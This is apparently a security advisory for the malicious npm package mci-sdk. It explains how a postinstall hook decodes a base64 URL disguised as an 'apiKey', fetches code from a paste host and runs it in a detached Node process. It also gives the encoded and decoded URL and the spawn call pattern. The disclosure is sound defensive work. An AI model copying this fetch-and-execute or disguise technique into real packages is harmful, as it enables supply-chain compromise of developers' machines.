VYPR
← All malware advisories

npm · Malicious package advisory

Malware

mci-sdk

MAL-2026-5931

Malicious code in mci-sdk (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (1ae26c09350fdf9fb630e382c71dd730583ba1822122d232cde49a259597264f)
On `npm install`, mci-sdk runs the postinstall hook `node./src/exec.js`, which imports `mci` from `src/core/index.js` and invokes it at module top level. The function reads a base64-encoded value stored as `MULTI_CHAIN_CONFIG.dev.apiKey` in `src/core/config.js` (`aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iLzJQNUZB`), decodes it to `https://jsonkeeper.com/b/2P5FA`, fetches the JSON via axios, and pipes `response.data.cookie` into `spawn('node', [], {detached:true, stdio:['pipe','ignore','ignore']})` followed by `child.unref()`. The fetched payload is therefore executed as Node.js code on the installer's machine, in a detached process that outlives the npm install. The remote source is an anonymous paste host, with no pinning, hash, or signature verification — whoever controls the paste controls arbitrary code execution on every install. The C2 URL is deliberately disguised under a field labeled `apiKey` and base64-encoded to evade casual review and URL scanners. The same `mci`/`multiChainInterface` symbol is also re-exported from the package main (`src/index.js`), so any consumer that imports the package and reaches that code path triggers the same fetch-and-execute. The package additionally clones the API surface and documentation of the legitimate `uhop/stream-chain` library (README and llms.txt link to `github.com/uhop/stream-chain/wiki/...`) to attract developers seeking that package.

Compromised versions (2)

  • 1.2.8
  • 1.2.10

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.